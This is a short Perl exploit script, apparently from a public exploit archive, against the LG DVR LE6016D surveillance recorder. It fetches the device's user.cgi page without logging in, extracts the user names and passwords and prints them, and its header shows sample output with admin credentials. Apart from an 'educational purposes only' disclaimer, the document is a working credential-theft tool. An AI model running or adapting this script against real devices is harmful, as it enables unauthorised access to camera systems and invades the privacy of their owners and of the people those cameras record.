#!/usr/bin/perl##LG DVR LE6016D unauthenticated remote # users/passwords disclosure exploit###Copyright 2015 (c) Todor Donev#<todor.donev at gmail.com>#http://www.ethical-hacker.org/#### ##Digital video recorder (DVR) surveillance is the use of cameras, #often hidden or concealed, that use DVR technology to record #video for playback or immediate viewing. As technological #innovations have made improvements in the security and #surveillance industry, DVR surveillance has become more #prominent and allows for easier and more versatile security #systems in homes and businesses. A DVR surveillance security #system can be designed for indoor use or outdoor use and can #often involve hidden security cameras, concealed “nanny cams” #for home security, and even personal recording devices hidden #on a person.#######Description:#No authentication (login) is required to exploit this vulnerability. #This program demonstrates how unpatched security bug would enable #hackers to gain control of a vulnerable device while sitting #behind their keyboard, potentially thousands of miles away.#An unauthenticated attacker that is connected to the DVR's may be #able to retrieve the device's administrator password allowing them #to directly access the device's configuration control panel.#######Disclaimer:#This or previous programs is for Educational purpose ONLY. Do not #use it without permission.The usual disclaimer applies, especially #the fact that Todor Donev is not liable for any damages caused by #direct or indirect use of the information or functionality provided #by these programs. The author or any Internet provider bears NO #responsibility for content or misuse of these programs or any #derivatives thereof. By using these programs you accept the fact#that any damage (dataloss, system crash, system compromise, etc.) #caused by the use of these programs is not Todor Donev's #responsibility.######Use them at your own risk!#### ## $ perl lg.pl 133.7.133.7:80#LG DVR LE6016D unauthenticated remote#users/passwords disclosure exploit#u/p: admin/000000#u/p: user1/000000#u/p: user2/000000#u/p: user3/000000#u/p: LOGOUT/000000# Copyright 2015 (c) Todor Donev# <todor.donev at gmail.com># http://www.ethical-hacker.org/#####
use LWP::Simple;print" LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n";if(@ARGV ==0){&usg;&foot;}while(@ARGV >0){
$t = shift(@ARGV);}
my $r = get("http://$t/dvr/wwwroot/user.cgi")or die("Error $!");for(my $i=0; $i <=4; $i++){if($r =~ m/<name>(.*)<\/name>/g){print" u\/p: $1\/";}if($r =~ m/<pw>(.*)<\/pw>/g){print"$1\n";}}&foot;
sub usg(){print"\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n";}
sub foot(){print"Copyright 2015 (c) Todor Donev\n<todor.donev at gmail.com>\n";print"http://www.ethical-hacker.org/\n";
exit;}
